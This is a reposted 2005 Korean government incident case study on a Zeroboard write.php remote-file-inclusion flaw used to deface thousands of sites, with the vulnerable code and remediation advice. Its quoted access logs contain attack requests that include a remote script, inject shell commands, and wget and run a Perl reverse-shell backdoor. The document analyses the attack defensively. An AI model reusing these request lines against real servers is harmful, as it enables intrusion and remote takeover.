Computer ???
| No. | 32 |
| Name. | swindler |
| Subject. | 제로보드 취약점을 악용한 홈페이지 변조사고 사례 |
| Main Cate. | Linux |
| Sub Cate. | |
| Date. | 2005-03-22 11:48 |
| Hit. | 28169 (211.219.39.230) |
| File. | |
| 국가사이버안전센터는 최근 게시판 제작 프로그램인 제로보드(Zeroboard)의 취약점을 이용해서 홈페이지를 변조하는 사고가 많이 발생됨에 따라 사례연구를 통해 심각성을 알리고 그 대응방안을 제시하고자 한다. 가. 개 요 이번 제로보드 취약점은 2004년 11월에 국내 보안업체에 의해 최초 발견되었고, 관련 취약점 정보가 제로보드 개발자에게 전달되었지만 개발자는 보안패치를 개발하지 않았으며, 이런 상황에서 12월 24일 취약점이 해외에 공개되어 해커들 사이에 알려지게 되었다. 제로보드 개발자는 12월 27일 뒤늦게 보안패치(PL5, Patch Level 5)를 발표하였지만 미처 조치를 취하지 못한 홈페이지들을 대상으로 해외 해커들이 12월 29일부터 대규모로 공격하기 시작해서 올해 1월말까지 국내 7천개 이상의 홈페이지에 변조피해를 입혔다. 이와 관련하여 국가사이버안전센터는 12월 29일 보안권고문을 게시해서 주의를 당부하였지만, 피해가 계속 증가하여 2005년 1월 7일‘주의’경보를 발령하였다. 또한 신규 취약점이 추가로 발견되어 국가사이버안전센터 홈페이지를 통해 1월 12일 자체 제작한 보안패치를 발표하는 등 피해 확산 방지에 주력하였다. 이러한 조치를 통해 점차 피해가 감소하여 2월 1일 사이버위기경보를 ‘정상’으로 환원하였다. 나. 사고내용 및 분석 국가사이버안전센터는 해커들의 홈페이지 변조 화면 등록사이트(Zone-H)에서 OO대학교내 학과 홈페이지의 메인페이지가 브라질 해커그룹 “un-root”에 의해 변조된 것을 확인하고 조사에 착수하였다. “un-root”는 브라질 해커단체로서 12월말부터 1월까지 25개의 국내 공공기관 홈페이지를 포함하여 1,400여 개의 홈페이지를 변조하였다. 아래 Access 로그를 보면, 해커는 write.php의 취약점을 악용하였는데, 이 취약점은 다른 홈페이지에 있는 악성 스크립트를 무단으로 실행시킬 수 있는 것으로 확인되었다. Access 로그내용 : 200.xxx.xxx.146 - - [25/Jan/2005:08:34:30 +0900]"GET/achievement /include/write.php?dir=http://bysteam.100free.com/tool25.dat?&cmd=cd%20..;cd%20..;touch%20x HTTP/1.1" 200 9739 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 원격으로 실행된 악성 스크립트(http://bysteam.100free.com/tool25.dat)는“ls”등의 각종 시스템 명령을 원격에서 수행할 수 있도록 구성되었으며, 해커는 이를 악용하여 시스템 저장 자료들을 유출할 수 있었다. 악성 스크립트 실행화면 또한, 해커는 wget 명령을 이용하여 cdzr0x.zip.net3에서 dc.pl.htm이라는 펄 스크립트를 /var/tmp 위치로 다운로드 받았는데, 이 스크립트는 피해시스템이 원격지로 역 접속토록 작동되어 해커에게 시스템 권한의 명령을 실행할 수 있도록 하는 방화벽 우회용 백도어인 것으로 확인되었다. Access 로그 내용 : 200.xxx.xxx.146 - - [25/Jan/2005:08:35:02+0900] "GET /achievement /include/write.php?dir=http://bysteam.100free.com/tool25.dat?&cmd=cd%20/var/tmp/;wget%20cdzr0x. zip.net/dc.pl.htm;perl%20dc.pl.htm%20200.217.10.146%2015 HTTP/1.1" 200 9920 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 결국 해커는 원격지에서 홈페이지 시스템에 대한 취약점 스캐닝 공격이나 취약점 공격코드(Exploit) 없이 제로보드를 사용하고 있는 것만 확인하고 해당 취약점을 악용하여 홈페이지를 변조하거나 시스템 정보를 유출할 수 있었다. 다. 취약점 내용 및 대응방법 1) 취약점 내용 문제된 write.php의 내용을 보면 $dir 변수에 대한 인자값을 아무런 제한없이 입력 가능하여 외부 홈페이지의 악성스크립트들을 실행할 수 있는 취약점이 존재하였다. 보안패치 전 취약한 write.php : 1 <? 2 3 // 쿠키값을 이용;; 4 $name=$zetyx[name]; 5 $email=$zetyx[email]; 6 $homepage=$zetyx[homepage]; 7 8 // 회원일때는 기본 입력사항 안보이게;; 9 if($member[no]) { $hide_start="<!--"; $hide_end="-->"; } 10 11 // 비밀글 사용;; 12 if(!$setup[use_secret]) { $hide_secret_start="<!--"; $hide_secret_end="-->"; } 13 14 // 공지기능 사용하는지 하지 않는지 표시;; 15 if(!$is_admin||$mode=="reply") { $hide_notice_start="<!--";$hide_notice_end="-->"; } 16 17 if(eregi(":\/\/",$dir)) $dir="."; 18???????? include $dir."/write.php"; 19 ?> ~ 2) 대응방안 국가사이버안전센터의 경보발령 사항과 보안권고문을 확인하여 PHP 업그레이드 및 php 환경변수 값 변경과 보안패치를 적용하여야 한다. 특히, 제로보드 운용자는 제로보드 공식 사이트 (http://www.nzeo.com)를 방문하여 보안패치(PL6)를 반드시 적용하여야 한다. 국가사이버안전센터 홈페이지에 게시된 관련정보는 다음과 같다. � 보안 예ㆍ경보 9번 � 보안권고문 59번, 60번, 64번, 65번 라. 결 론 이번 사고는 국내에서 널리 사용되고 있는 무료 홈페이지 게시판 제작 프로그램인 제로보드의 보안취약점이 있음에도 불구하고 무분별하게 사용한 것이 직접적인 원인이었다. 이러한 무료 프로그램은 홈페이지 구축 비용을 절감하는 효과가 있지만 보안성에 대한 검증이 이루어지지 않아 해킹위험에 노출되기 쉽다. 금번 해킹사고는 해커들이 자신의 실력 과시용으로 단순히 홈페이지 변조피해만 입혔지만 정보탈취나 시스템파괴 등의 악의적인 의도를 가졌더라면 돌이킬 수 없는 손실을 입을 수 있었던 사고였다. 각급 기관 홈페이지 운용자는 웹서버 운용프로그램을 최신 버전으로 유지하고 보안성과 안전성이 검증된 프로그램을 사용하여야 한다. 또한 주기적으로 국가사이버안전센터 홈페이지를 방문하여 최신의 사이버위협정보를 확인하고 시스템 보안점검을 수행하여야 할 것이다. 출처 : 국가사이버안전센터 'Monthly 사이버 시큐리티 1월호'에서 발췌 [바로가기 링크] : http://coolx.net/cboard/computer/32 |
|
|
|
|
| [Modify] [Delete] | [Reply] [List] | |
Copyright © 1999-2017, swindler. All rights reserved.
367,611 visitor ( 1999.1.8-2004.5.26 ), 2,405,771 ( -2017.01.31)